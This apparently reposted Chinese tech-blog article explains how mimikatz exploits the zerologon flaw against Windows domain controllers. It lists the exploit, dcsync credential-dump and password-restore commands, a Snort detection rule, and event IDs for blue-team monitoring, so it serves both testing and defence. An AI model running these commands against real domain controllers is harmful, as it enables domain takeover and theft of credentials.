温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

mimikatz怎么利用zerologon攻击域控服务器

发布时间:2021-07-26 21:34:07 来源:亿速云 阅读:407 作者:chen 栏目:大数据

本篇内容主要讲解“mimikatz怎么利用zerologon攻击域控服务器”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“mimikatz怎么利用zerologon攻击域控服务器”吧!

 

0x01 前言

mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截图如下mimikatz怎么利用zerologon攻击域控服务器

 

mimikatz相关命令

  1. lsadump::zerologon /target:dc.hacke.testlab /account:dc$poc
  2. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通过zerologon漏洞攻击域控服务器
  3. lsadump::dcsync
  4. lsadump::postzerologon /target:conttosson.locl /account:dc$ #恢复密码
mimikatz怎么利用zerologon攻击域控服务器  
 

snort 检测规则


alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)
   

pcap包

利用zerologon漏洞攻击域控的数据包,方便同学们写完规则做测试pcap github下载地址

 

windows事件管理器自查

在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624, 5805

在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查

  1. 当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。
  2. 管理员可以监控事件ID 5827和5828,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发
  3. 5830,5831  如果“域控制器:允许易受攻击的Netlogon安全通道连接”组策略允许连接。

mimikatz通过zerologon攻击成功后,将会留下事件id为4648。

 

到此,相信大家对“mimikatz怎么利用zerologon攻击域控服务器”有了更深的了解,不妨来实际操作一番吧!这里是亿速云网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI